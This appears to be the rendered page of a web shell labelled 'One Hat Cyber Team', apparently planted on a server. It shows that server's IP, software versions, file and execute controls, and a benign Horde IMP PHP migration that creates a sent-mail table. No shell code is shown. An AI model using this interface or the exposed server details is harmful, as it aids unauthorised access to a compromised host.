⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.50
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
imp
/
migration
/
View File Name :
1_imp_base_tables.php
* @category Horde * @license http://www.horde.org/licenses/gpl GPL * @package IMP */ class ImpBaseTables extends Horde_Db_Migration_Base { /** * Upgrade. */ public function up() { // Create: imp_sentmail $tableList = $this->tables(); if (!in_array('imp_sentmail', $tableList)) { $t = $this->createTable('imp_sentmail', array('autoincrementKey' => false)); $t->column('sentmail_id', 'bigint', array('null' => false)); $t->column('sentmail_who', 'string', array('limit' => 255, 'null' => false)); $t->column('sentmail_ts', 'bigint', array('null' => false)); $t->column('sentmail_messageid', 'string', array('limit' => 255, 'null' => false)); $t->column('sentmail_action', 'string', array('limit' => 32, 'null' => false)); $t->column('sentmail_recipient', 'string', array('limit' => 255, 'null' => false)); $t->column('sentmail_success', 'integer', array('null' => false)); $t->primaryKey(array('sentmail_id')); $t->end(); $this->addIndex('imp_sentmail', array('sentmail_ts')); $this->addIndex('imp_sentmail', array('sentmail_who')); $this->addIndex('imp_sentmail', array('sentmail_success')); } } /** * Downgrade. */ public function down() { $this->dropTable('imp_sentmail'); } }